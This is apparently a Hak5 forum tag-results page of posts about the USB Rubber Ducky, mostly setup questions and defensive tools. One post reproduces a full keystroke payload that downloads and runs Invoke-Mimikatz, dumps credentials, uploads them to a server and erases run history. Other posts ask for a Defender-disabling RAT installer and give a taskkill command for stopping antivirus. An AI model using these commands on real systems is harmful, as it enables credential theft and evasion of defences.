Jump to content

Search the Community

Showing results for tags 'rubberducky'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • Hak5 Gear
    • Hak5 Cloud C²
    • WiFi Pineapple Mark VII
    • USB Rubber Ducky
    • Bash Bunny
    • Key Croc
    • Packet Squirrel
    • Shark Jack
    • Signal Owl
    • LAN Turtle
    • Screen Crab
    • Plunder Bug
  • O.MG (Mischief Gadgets)
    • O.MG Cable
    • O.MG DemonSeed EDU
  • WiFi Pineapple (previous generations)
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapples Mark I, II, III
  • Hak5 Shows
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


Location


Interests


Enter a five letter word.

  1. I've been trying to encode my USB Rubber Ducky on my Mac Desktop, and I can't figure out how! Please help, I can't wait to use it! Also, there was another USB that came in the package with the Rubber Ducky, what is this for? Thanks, Luke
  2. Hi everybody One of the largest and well known Enterprise Security Conferences in Germany is C-Forge, run by Virtual Forge, a large Security Software Company. C-FORGE, May 30 + 31st 2017 , Heidelberg, Germany It is all centered around the (in)famous SAP ERP Software, used by almost all medium and large companies in the world. Since I am a professional pen tester for large SAP systems, I was asked to held a presentation. Everybody liked the proposal of a one-hour presentation of my Hak5-Backpack, with RubberDucky, LANTurtle, BashBunny, of course Pineapple TETRA and a great german product called miniChameleon, which copies and mimics RFID and NFC Cards (like hotel keys and corporate badges) . This will be a rundown about a SAP PenTest playbook scenario (with live elements) to get passwords and hashes with these devices. My experience is, that HW-attacks are often overlooked in Enterprises, but are much more risky, dangerous and overall much more likely than any network hack. So if you happened to be in the area, stop by. It is of no cost, if you are working for a SAP-customer. Check my presentation link and more conference information: C-Forge Presentation "Cracking the SAP Perimeter"
  3. Hello. I have some question to Bashbunny first. Where can I watch or learn bashbunny script? second. What is difference with rubber ducky? Is that a "network rubber ducky"?
  4. Im kind interested is it possible to use USB rubber ducky on IOT devices like router, modem , servers ?
  5. I just got the usb rubber ducky in the mail and trying to flash twinduck, but cant get the usb rubber ducky in dfu mode ive tried everything, holding it before putting it in the laptop nothing is working, and seems like this forum is the only place to get support for this, unless someone knows how to get ahold of the people who makes it
  6. Hello guys!! I really need some help. I have no idea about hacking. I purchase a rubber ducky as I saw that it is possible to enable developer options on an Android phone. I have an S5 that by an accident got the screen cracked and it works fine...but I dont see a single pixel on the screen...I can receive texts (I can her them). I need to recover my files, photos, etc. I craving for help. I need guide how to do that (enable developer options) as I found a software to recover the info but it needs the Developer Option enabled. I appreciate any help on this.
  7. So I was testing out the 15 second rubber ducky attack and i'm not to sure how I should be doing the webserver nor what i'm doing wrong. I am very new to hacking and specially webservers, so please don't be too rough on me. So what I have done so far is just dump everything into the apache server, as I expected I didn't get the output file. Just let me know how stupid I am and where I went wrong. This is the webserver right now: http://imgur.com/5NKP0es http://imgur.com/miCNdsr http://imgur.com/Sa1Ish6 http://imgur.com/VWJqkJZ
  8. HI, I try to put my helloworld.txt into an inject.bin file and if i put in java -jar duckencode.jar -i helloworld.txt it says error: unable to access jarfile duckencode.jar Sorry for my bad english :)
  9. Hi guys.. Idk if this is happening beacuse I'm using windows 10, but I can't get any report from the ducky. I tried ftp, email and usb report methods from ducktollkit. . None of them worked. Also tried the simple-ducky script to create a payload and send the files back via ftp(the ftp and apache server were started automatically by the script). Please help me out! :)
  10. is it possible to use the rubber ducky to turn of Windows Defender inject a rat and install it and that all in once could someone help me i am new with this (if you can could you write a script for me that is able to do this) Thanks for the help i really appreciate it Kind regards Scott
  11. Greetings, I have been toying around with my Rubber Ducky for a couple days now and I have been doing some tests on Windows 10 64bit mostly. I am currently running twinduck version: c_duck_v2_S002. I was ideally looking for a payload that would use mimikatz to extract the windows password from the current user and save it onto the ducky itself but none have worked yet. I also tried out the web server method with a local hosted apache2 web server(replacing the x's with my actual local hosted address): DELAY 1000 REM Open an admin command prompt GUI r DELAY 500 STRING powershell Start-Process cmd -Verb runAs ENTER DELAY 2000 ALT y DELAY 1000 REM Obfuscate the command prompt STRING mode con:cols=18 lines=1 ENTER STRING color FE ENTER REM Download and execute Invoke Mimikatz then upload the results STRING powershell "IEX (New-Object Net.WebClient).DownloadString('192.xxx.x.xx/im.ps1'); $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString('192.xxx.x.xx/rx.php', $output)" ENTER DELAY 15000 REM Clear the Run history and exit STRING powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue" ENTER STRING exit ENTER I can access both the files from the targeted system with my browser so the web server is working fine. I am listening with netcat but never receives the data?? With: 'nc -l -p 80'. What am I doing wrong here?
  12. Are there any cases or bags sold that can hold various Hak5 equipment like the pineapple, yagi, their cables and antennas and future equipment? Thanks
  13. Hey all, I made a first pass at a rogue-USB-device defense called Beamgun. It's a tiny Windows-only service that listens for keyboards, network adapters, and usb storage devices and takes some user defined action (like locking the workstation or disabling the network adapter). Code's here: https://github.com/JLospinoso/beamgun Two blog posts on how it works (but it's pretty self explanatory): https://jlospinoso.github.io/infosec/usb rubber ducky/c%23/clr/wpf/.net/security/2016/11/15/usb-rubber-ducky-defeat.html https://jlospinoso.github.io/infosec/usb rubber ducky/lan turtle/c%23/clr/wpf/.net/security/2016/11/30/beamgun-update-poison-tap.html Y'all are an incredibly innovative group and I'd love if you absolutely attack the crap out of it. Game on!! Josh
  14. So i was looking at getting a rubber ducky but i decided to test an arduino first. But i have one major problem, since im in Norway whenever the arduino runs the script it types different symbols than what i put into the script. I know this is because the arduino types using us layout. Would the rubber ducky have the same issue for me? Or could i change this or something? Any way i can fix the arduino to type in nordic layout? Thanks :)
  15. Recently got my usb rubber ducky in the mail and it's been working great so far, except it doesn't seem to want to enter DFU mode. Unlike other people on the forum, the replay button works just fine, I've tested it multiple times. I've followed every tutorial I could find and none seem to work, I've tried it in every usb port on my machine, with and without the microsd, but even though i start holding the button down well before i plug it in, and keep it held for a while after, the ducky executes the current payload as though i wasn't, and doesn't show up in the device manager at all (win10 64x). I'm loving it so far with the base firmware but i feel like I'm missing out on a big part of the fun if i can't flash it, any help or ideas would be greatly appreciated.
  16. Recently got my usb rubber ducky in the mail and it's been working great so far, except it doesn't seem to want to enter DFU mode. Unlike other people on the forum, the replay button works just fine, I've tested it multiple times. I've followed every tutorial I could find and none seem to work, I've tried it in every usb port on my machine, with and without the microsd, but even though i start holding the button down well before i plug it in, and keep it held for a while after, the ducky executes the current payload as though i wasn't, and doesn't show up in the device manager at all (win10 64x). I'm loving it so far with the base firmware but i feel like I'm missing out on a big part of the fun if i can't flash it, any help or ideas would be greatly appreciated.
  17. I haven't tested it yet, but it seems impractical to me: https://jlospinoso.github.io/infosec/usb rubber ducky/c%23/clr/wpf/.net/security/2016/11/15/usb-rubber-ducky-defeat.html https://github.com/JLospinoso/beamgun
  18. Hello. I am getting the following error when running the reverse shell script: c:\decoder.vbs(2, 179) Microsoft VBScript compilation error: Expected integer constant I tried it on Windows 7 and 10 with the same result. Here is the script I am using: And here is the screen output: Any help would be much appreciated! Thanks in advance.
  19. Hey guys, I know most of the post here are about attacks for the rubberducky, but I wanted to share something different with you today: a script to prevent rubberducky attacks. DuckHunt: https://github.com/pmsosa/duckhunt For now it is a project intended to protect users against Rubberducky attacks (or other automated key injection attacks). I made sure to document as much as I could in the github page so that others can keep adding and eventually it could lead to a larger discussion on how to protect users from these types of attacks. I read the previous Defense Against Ducky posts, and it seems that people had lots of ideas surrounding how to defend against these guys. I was just curious to see what would be other legitimate things one could add to protect against these :) Cheers, - Konuko II
  20. I am a noob to hacking in general (everyone has to start somewhere). I had bought a Rubber Ducky, flashed TwinDuck firmware on it, and attempted to launch a payload called "Payload WiFi password grabber" by Siem (https://github.com/hak5darren/USB-Rubber-Ducky/wiki/Payload---WiFi-password-grabber). When placing it in my Duck (nothing else inside the duck besides the payload) and clicking the replay button I am prompted with these lists of errors on the Command Prompt: goo.gl/R2xqx9 What am I doing Incorrectly? Please help.
  21. so i got my usb rubberducky in the mail, and upon watching the instructionals on youtube i have to say im at a complete loss of wtf to do. im new to all this. ive tried downloading the duckencoder but the .jar file cant be opened. i also downloaded DuckyScript UDL, Duck Firmware.hex, and notepad ++. still im stumped. please help!
  22. so i got my usb rubberducky in the mail, and upon watching the instructionals on youtube i have to say im at a complete loss of wtf to do. im new to all this. ive tried downloading the duckencoder but the .jar file cant be opened. i also downloaded DuckyScript UDL, Duck Firmware.hex, and notepad ++. still im stumped. please help!
  23. Hi, My newly acquired Ducky seems to be malfunctioning.. I am a NOOB to the ducky and need some insight from the more experienced users. The light on my Ducky stays a constant RED, I have formatted the SD card, placed another card in the injector and still the same results. I hope I did not receive a BAD DUCK. Please help. Thanks.
  24. Hello guys, I've got a question considering antivirusses blocking rubber ducky payloads. I see all these .exe payloads like chromepass.exe and wirelesskeyview.exe being used in rubber duckies. Doesn't the antivirus of the attacked PC block the .exe programs when they start running from cmd? Or will it just work normally? If that is the case, this script can disable Windows Defender easily. Most PCs dont have windows defender as the only protection tho, so it is needed to disable other antivirusses, right? Most antivirusses can be shut off with the taskkill command, i tried killing my MalwareBytes and it worked: (remove " ") taskkill /f /im "Insert antivirusprogram name here.exe" Can someone help me out with this? I want to know if im just being dumb here, since all of this might not be needed. Thanks in advance
  25. Hi there, Really want to buy one of each (RubberDucky, LanTurtle), but South Africa is not in the list of areas to ship to. Would be awesome to demo these things to my security pupils. Any help would be appreciated.
×
×
  • Create New...